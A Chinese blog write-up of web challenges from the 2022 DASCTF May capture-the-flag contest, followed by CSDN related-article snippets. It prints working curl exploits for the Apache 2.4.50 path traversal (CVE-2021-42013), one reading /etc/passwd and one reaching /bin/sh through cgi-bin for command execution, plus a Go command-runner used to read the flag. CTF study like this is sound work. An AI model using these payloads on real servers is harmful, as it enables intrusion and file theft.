2022DASCTF MAY

最新推荐文章于 2024-04-27 20:13:50 发布
最新推荐文章于 2024-04-27 20:13:50 发布
阅读量268 收藏
点赞数
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/125913292
版权

大佬们都在努力,我个小白也不能落下加油!!!


Power Cookie

打开界面,额用游客的方式登录,点一下 

啥都没有,一般这样的题都是抓包改一下,cookie的值或者x-forwarded-for等

提示admin那就是cookie 

试了一下,发现cookie admin=1就可以了 

魔法浏览器

没啥思路,还是看一下源码扒

 hex编码,解码一下,

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Magic/100.0.4896.75

 log

 然后改一下文件User-Agent

 就可以获得flag

getme

打开页面<!-- pwd:/usr/local/apache2/ -->,就这一个目录信息

一个字,蒙!

然后burp扫一下,发现

 搜索一下Apache/2.4.50 (Unix),

Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)

漏洞利用poc:

curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

可以查看任意文件 

说明存在漏洞

目标服务器开启cgi或者cgid时候,可以命令执行

    curl -v --data "echo;命令" '目标地址:端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

 或者

GET :

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

POST:

echo Content-Type: text/plain; echo;ls /

不知道什么原因, 不返回值,可是看其他wp就是这样,然后就出来目录,接着探索,可能是我burp出错了,调试一下。

 

hackme

打开界面发现最下面可以点击,那点击进去

 

 发现可能每一个链接中有一个文件,而每一个对应的文件中执行了一条命令。像上面的whoami、pwd等等。

看到这然后,go语言目前还没学到,先简单了解一下,Go语言中用 os/exec 执行命令的五种姿势 - 知乎需要上传个uers文件,然后他就会进行go的解析

package main
 
import (
    "fmt"
    "os/exec"
)
 
func main() {
    Command("ls /")            执行的命令
}
 
func Command(cmd string) error {
    c := exec.Command("bash", "-c", cmd)
    output, err := c.CombinedOutput()
    fmt.Println(string(output))
    return err
}

 

最后发现flag,用cat /flag 代替上面语句中的ls /即可查找到flag。所以这个题看似其实不完全考到go即使不是很懂go语言,考的是go脚本。

后面俩道题,实现是能力,不够,继续学习

 

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
lammps-4May2022.tar
07-20
lammps-4May2022.tar
GeneFace中需要用到的May.zip
11-05
《GeneFace与May.zip在生物信息学中的应用详解》 在现代生物信息学领域,GeneFace是一个备受关注的工具,它主要用于基因识别和分析。在这个领域中,数据处理和分析的效率至关重要,而"May.zip"文件正是为GeneFace...
2022DASCTF MAY Power cookie
a1563361185的博客
05-22 428
进入题目场景 如图所示 点击login by guest 得到如图所示 显示游客不可用,再由题目的给出的提示可以知道,只有管理员有资格访问 按F12进入控制台,输入document.cookie查看cookie,得到 (这里本来应当是空格,但我自己写过了所以只改回了0,效果一样的) 输入document.cookie="admin=1".得到管理员 接着刷新界面 得到flag ...
DASCTF 2022 9月挑战赛 cyberprinter
zyxx_wjc的博客
09-27 326
DASCTF 2022 9月挑战赛 cyberprinter
DASCTF2022.07赋能赛 - Pwn easyheap
qq_34010404的博客
07-25 1605
DASCTF 2022.07赋能赛
[DASCTF2022]三月月赛WriteUp Web部分全复现
Pysnow's Blog
04-11 3399
Web ezpop ezpop <?php highlight_file(__FILE__); class crow { public $v1; public $v2; function eval() { echo "crow::eval<br>"; echo new $this->v1($this->v2); } public function __invoke() { echo
[DASCTF 2022]三月赛 web 复现
cosmoslin的博客
03-29 6506
ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public
UL 60335-2-3-2022(May 10, 2022)Household and Similar
11-24
UL 60335-2-3-2022(May 10, 2022)Household and Similar
openstck镜像-KVM虚拟机镜像 -WIN2022
05-26
利用zh-cn_windows_server_2022_updated_may_2023_x64_dvd_659778fe.iso(2023年5月)安装生成,virtio驱动为virtio-win-0.1.225.iso中的WIN2022驱动 ,在OPENSTACK的Q版、T版、Y版中测试可用。 磁盘容量20G,C盘16G...
mayday试用版
08-08
这个就是一个小小的应用的一个小小的试用版,欢迎大家踊跃下载
[Misc]2022DASCTF Apr X FATE 防疫挑战赛 wp
mumuzi的博客
04-24 4407
das4
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2570
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
[2022DASCTF]ezpop
m0_63045593的博客
04-22 1512
[2022DASCTF]ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public
DASCTF X GFCTF 2022十月挑战赛 Writeup
末初的CSDN博客
10-28 1906
DASCTF X GFCTF 2022十月挑战赛 Writeup
2022DASCTF MAY web
weixin_63231007的博客
07-20 468
命令"'目标地址端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'curl-v--path-as-is目标地址端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。所有需要我们上传一个users.go文件,然后其执行,我们访问users,会返回文件执行结果。......
2023年楚慧杯(DASCTF)WP
ZJPC007的博客
12-18 683
怎么说呢,就是感觉比赛时间有点紧,3个小时15道题,然后还要结束前提交wp,就有点来不及,当时提交的wp还是匆匆一写。还有一个槽点就是这个比赛的时候不能看实时排名,只能依靠积分来盲猜,这多少有点难受(我们队有段时间积分掉到0.7我还以为要淘汰了。。。最后以一题之差屈居第二。
中间件,框架漏洞
hovcfuti的博客
07-28 131
爆出weblogic的WLS组件存在xmldecoder反序列化漏洞,直接post构造的xml数据包即可。文件夹解析:新建文件夹:aaa.asp,文件夹下的所有文件都会被当成asp去解析。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝。版本对路径规范化所做的更改中存在—个路径穿越漏洞,Weblogic IIOP协议反序列化(CVE-Weblogic T3协议反序列化(CVE-射到由类似别名的指令配置的目录之外的文件。Weblogic未授权访问-CVE-,则这可能允许远程代码执行。
【小迪安全2023】第59天:服务攻防-中间件安全&CVE复现&lS&Apache&Tomcat&Nginx
最新发布
人若无名,便可专心练剑
04-27 1598
攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。4、中间件-Tomcat-弱口令&文件上传&文件包含等。
Apache Httpd 常见漏洞解析(全)
黑战士的博客
02-17 2853
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
18may20java
09-17
18may20java是指2020年5月18日发行的Java版本。Java是一种面向对象的编程语言,由Sun Microsystems(现在是Oracle公司)在1995年推出。它通过Java虚拟机(JVM)来实现平台无关性,使得开发人员可以编写一次代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值